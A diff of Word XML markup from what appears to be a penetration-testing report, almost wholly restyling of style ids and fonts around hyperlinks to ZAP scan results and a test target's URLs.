                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -7229,7 +7229,7 @@
             <w:hyperlink r:id="rId28" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10063" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -7343,7 +7343,7 @@
             <w:hyperlink r:id="rId29" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10037" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -7457,7 +7457,7 @@
             <w:hyperlink r:id="rId30" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10036" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -7571,7 +7571,7 @@
             <w:hyperlink r:id="rId31" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10096" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -7685,7 +7685,7 @@
             <w:hyperlink r:id="rId32" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10021" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -7799,7 +7799,7 @@
             <w:hyperlink r:id="rId33" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10111" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -7913,7 +7913,7 @@
             <w:hyperlink r:id="rId34" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#90027" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -8027,7 +8027,7 @@
             <w:hyperlink r:id="rId35" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10058" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -8141,7 +8141,7 @@
             <w:hyperlink r:id="rId36" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10024" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -8255,7 +8255,7 @@
             <w:hyperlink r:id="rId37" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10049" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -8369,7 +8369,7 @@
             <w:hyperlink r:id="rId38" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10112" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -8483,7 +8483,7 @@
             <w:hyperlink r:id="rId39" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10049" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -8597,7 +8597,7 @@
             <w:hyperlink r:id="rId40" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10104" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -8711,7 +8711,7 @@
             <w:hyperlink r:id="rId41" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10031" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -8890,7 +8890,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -8913,7 +8913,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="4"/>
@@ -8983,7 +8983,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9025,7 +9025,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
@@ -9691,7 +9691,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -9833,7 +9833,7 @@
             <w:hyperlink r:id="rId42" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#40012" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -9932,7 +9932,7 @@
             <w:hyperlink r:id="rId43" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#6" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10031,7 +10031,7 @@
             <w:hyperlink r:id="rId44" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#90020" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10130,7 +10130,7 @@
             <w:hyperlink r:id="rId45" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#40018" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10229,7 +10229,7 @@
             <w:hyperlink r:id="rId46" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10202" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10328,7 +10328,7 @@
             <w:hyperlink r:id="rId47" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#20012" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10427,7 +10427,7 @@
             <w:hyperlink r:id="rId48" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10038" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10527,7 +10527,7 @@
             <w:hyperlink r:id="rId49" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10106" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10629,7 +10629,7 @@
             <w:hyperlink r:id="rId50" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#30003" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10731,7 +10731,7 @@
             <w:hyperlink r:id="rId51" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10020" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10833,7 +10833,7 @@
             <w:hyperlink r:id="rId52" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10003" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -10935,7 +10935,7 @@
             <w:hyperlink r:id="rId53" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#90022" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11025,7 +11025,7 @@
             <w:hyperlink r:id="rId54" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10110" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11115,7 +11115,7 @@
             <w:hyperlink r:id="rId55" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10063" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11205,7 +11205,7 @@
             <w:hyperlink r:id="rId56" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10036" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11295,7 +11295,7 @@
             <w:hyperlink r:id="rId57" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10021" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11385,7 +11385,7 @@
             <w:hyperlink r:id="rId58" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10111" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11487,7 +11487,7 @@
             <w:hyperlink r:id="rId59" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10027" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11589,7 +11589,7 @@
             <w:hyperlink r:id="rId60" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10109" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11691,7 +11691,7 @@
             <w:hyperlink r:id="rId61" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10049" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11793,7 +11793,7 @@
             <w:hyperlink r:id="rId62" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10104" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -11895,7 +11895,7 @@
             <w:hyperlink r:id="rId63" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10031" w:history="1">
               <w:r>
                 <w:rPr>
-                  <w:rStyle w:val="931"/>
+                  <w:rStyle w:val="941"/>
                   <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
@@ -12087,7 +12087,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="885"/>
+        <w:pStyle w:val="895"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="4"/>
@@ -12122,7 +12122,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="884"/>
+        <w:pStyle w:val="894"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12193,7 +12193,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="4"/>
@@ -12337,7 +12337,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -12997,8 +12997,6 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:highlight w:val="none"/>
               </w:rPr>
             </w:r>
@@ -13040,8 +13038,6 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:highlight w:val="none"/>
               </w:rPr>
             </w:r>
@@ -13148,7 +13144,7 @@
       <w:hyperlink r:id="rId64" w:tooltip="http://92.51.39.106:8060/users/login.php" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:highlight w:val="none"/>
           </w:rPr>
@@ -13156,7 +13152,7 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:highlight w:val="none"/>
           </w:rPr>
@@ -13284,7 +13280,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
       <w:r>
@@ -13589,7 +13584,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:r>
       <w:r>
@@ -13617,7 +13612,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
@@ -13649,7 +13644,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
@@ -13681,7 +13676,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
@@ -13713,7 +13708,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
@@ -13745,7 +13740,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
@@ -13773,7 +13768,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="none"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:r>
       <w:r>
@@ -13796,6 +13791,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
@@ -13916,11 +13912,10 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
       <w:r>
@@ -14054,7 +14049,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -14981,9 +14976,8 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
-          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
       <w:r>
@@ -15033,6 +15027,11 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15051,6 +15050,11 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15069,6 +15073,11 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15087,6 +15096,11 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15114,7 +15128,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="4"/>
@@ -15261,7 +15275,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="758"/>
+        <w:tblStyle w:val="768"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
@@ -16080,7 +16094,7 @@
       <w:hyperlink r:id="rId65" w:tooltip="http://92.51.39.106:7799/server.html" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:highlight w:val="none"/>
           </w:rPr>
@@ -16088,7 +16102,7 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
             <w:highlight w:val="none"/>
           </w:rPr>
@@ -16184,7 +16198,6 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:highlight w:val="none"/>
@@ -16260,6 +16273,7 @@
       </w:r>
       <w:r>
         <w:rPr>
